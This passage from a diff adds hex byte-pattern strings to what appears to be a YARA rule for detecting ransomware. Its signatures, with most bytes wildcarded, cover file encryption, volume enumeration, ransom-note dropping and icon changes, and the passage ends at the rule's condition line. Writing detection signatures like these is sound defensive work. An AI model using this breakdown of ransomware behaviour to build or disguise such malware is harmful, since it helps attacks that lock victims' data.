+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ??
+            FF 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? FF 75 ?? 83
+        }
+		$encrypt_files_v5_p2 = {
+            C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C ?? 81 FF ?? ??
+            ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 66 0F 13 45
+            ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CF 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 50 51 E8 ??
+            ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 45 ?? F2 0F
+            11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 ?? ?? ?? ??
+            39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ??
+            8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 85
+            C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F 11 45 ?? 50
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 50 FF 75 ??
+            FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? ?? ?? 89 45
+            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 FF 75 ?? 57
+            6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 57
+            C0 66 0F 13 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B
+            7D ?? 89 45 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B CF 0F A4 C8 ?? 6A ?? C1 E1 ?? 03
+            4D ?? 6A ?? 13 45 ?? 50 51 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 8B 45 ??
+            13 45 ?? 89 45 ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 7D ?? 0F 82
+        }
+		$encrypt_files_v6_p1 = {
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 85 F6 0F 8F ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 03 48 ?? 8B 01 FF 50 ?? 83 7B ?? ?? 8D 43 ??
+            F2 0F 10 05 ?? ?? ?? ?? 0F 43 43 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 8D 45 ?? 50 57 FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C6 45 ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B
+            C2 ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B CF 76 ?? 8B FE 2B 7D ?? 66
+            8B 04 0F 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? 2B 75 ?? D1 FE E9 ?? ?? ?? ?? 8B 7D
+            ?? 83 C6 ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B
+            75 ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+        }
+		$encrypt_files_v6_p2 = {
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
+            6A ?? E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ??
+            ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ??
+            FF 75 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C
+        }
+		$encrypt_files_v6_p3 = {
+            81 FE ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0
+            66 0F 13 45 ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CE 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2
+            50 51 E8 ?? ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89
+            45 ?? F2 0F 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85
+            ?? ?? ?? ?? 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ??
+            ?? ?? ?? 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FE ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10
+            05 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F
+            11 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 C6 45
+            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52
+            50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ??
+            ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50
+            FF 75 ?? 56 6A ?? 6A ?? 57 C6 45 ?? ?? 8B 4D
+        }
+		$set_default_icon_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
+            89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? B0 ?? C7 45 ?? ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 98
+            66 31 44 4D ?? 41 83 F9 ?? 73 ?? 8A 45 ?? EB ?? 33 C0 56 66 89 45 ?? C6 45 ?? ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 C7 45
+            ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2
+        }
+		$set_default_icon_p2 = {
+            81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
+            51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ??
+            ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 6A ?? 66 89 45 ?? 8D 45 ?? 0F 43
+            45 ?? 6A ?? 6A ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 8D 4D
+            ?? 8B 45 ?? 0F 43 4D ?? 03 C0 50 51 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 B8 ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 89 45
+            ?? C6 45 ?? ?? 8B 4D ?? 5E 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9
+            ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_system_volumes = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ??
+            ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? C7 06 ?? ?? ?? ??
+            C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 66 90
+            8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 D2 C7 45 ?? ?? ?? ?? ?? 66 89 55 ??
+            83 C4 ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 0C 00 C7 45 ?? ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 03 C1 C7 45 ?? ?? ?? ?? ?? 3B D0 74 ?? D1 F9 8B C2
+            51 50 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 46 ?? 3B 46 ?? 74 ??
+            6A ?? 51 50 C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 46 ?? ?? 66 89 45 ??
+            EB ?? 51 50 8B CE E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C
+            4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8
+            ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 66 89 45 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ??
+            57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C6 5F 5E 5B 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$drop_ransom_note_v2_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? 53
+            56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B D8 2B CF 83 C4 ?? 3B CB 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            8D 0C 3B C7 45 ?? ?? ?? ?? ?? 0F 43 45 ?? BE ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B CE 76 ?? 8B F1 83 CE ?? 81 FE
+            ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 3B F0 0F 42 F0 8D 46 ?? 50 8D
+            4D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 0C 3B 89 45 ?? 89 75 ?? 8D 34 3F 56 FF 75 ?? 89 4D
+            ?? 50 E8 ?? ?? ?? ?? 8B 7D ?? 8D 04 1B 50 68 ?? ?? ?? ?? 8D 0C 3E 51 E8 ?? ?? ?? ??
+            8B 45 ?? 33 C9 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 0C 47 C6 45 ?? ?? B8 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 8D 4D ?? FF 35 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B F0 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 C4 ?? 66
+        }
+		$drop_ransom_note_v2_p2 = {
+            89 06 BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B
+            4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B
+            50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 66 89 45
+            ?? 8D 45 ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B F8 83 FF ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 57 FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B 4D ?? 5F 5E 5B 83 F9 ?? 72
+            ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B
+            C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D
+            ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_v5 = {
+            50 FF 15 ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74
+            ?? C6 45 ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 0C 41 89 4D ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 8D
+            04 78 89 45 ?? 51 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 45
+        }
+		$find_system_volumes_v2_p1 = {
+            C7 45 ?? ?? ?? ?? ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A
+            ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? 8D 04 41 50 8B C1 8D 4D ?? 50
+            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8B 4D ?? 3B 4D ?? 74 ?? 6A ?? 56 51 C7 01 ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ??
+            ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 83 45 ?? ?? EB ?? 56 51 8D 4D ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 75 ?? 33 C9 89 4D ?? B8 ??
+            ?? ?? ?? 8B 4D ?? 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 0F 84 ?? ?? ?? ?? 33 DB
+            8D 4D ?? 8D 04 33 89 4D ?? C6 45 ?? ?? 8D 4D ?? 51 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 4D ?? 83 CF ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 83 E7 ?? 89 7D ?? C6 45 ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 3B 35 ?? ?? ?? ?? 74 ??
+            6A ?? 50 56 89 75 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C6
+        }
+		$find_system_volumes_v2_p2 = {
+            45 ?? ?? 8B 45 ?? 89 46 ?? C6 45 ?? ?? 83 05 ?? ?? ?? ?? ?? EB ?? 50 56 B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ??
+            8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 C0 8B 75 ?? 83 C3 ?? FF 45 ?? 2B CE
+            66 89 45 ?? B8 ?? ?? ?? ?? F7 E9 C7 45 ?? ?? ?? ?? ?? C1 FA ?? 8B C2 C7 45 ?? ?? ??
+            ?? ?? C1 E8 ?? 03 C2 39 45 ?? 0F 82 ?? ?? ?? ?? 83 E7 ?? 89 7D ?? C7 45 ?? ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 5F 5B EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F3
+            0F 7E 05 ?? ?? ?? ?? 8B F0 2B 75 ?? 66 0F D6 45 ?? 90 8B 55 ?? 8B 4D ?? E8 ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 F2 0F 59 C1 F2 0F 59 C1
+            F2 0F 11 45 ?? 74 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B C8 74 ?? 6A ?? 51 FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 0F 57 C0 66 0F 13 05 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F2 0F 10 45 ?? 83 EC ?? F2 0F 11 44 24 ?? 66 0F 6E C6
+            F3 0F E6 C0 C1 EE
+        }
 
 	condition:
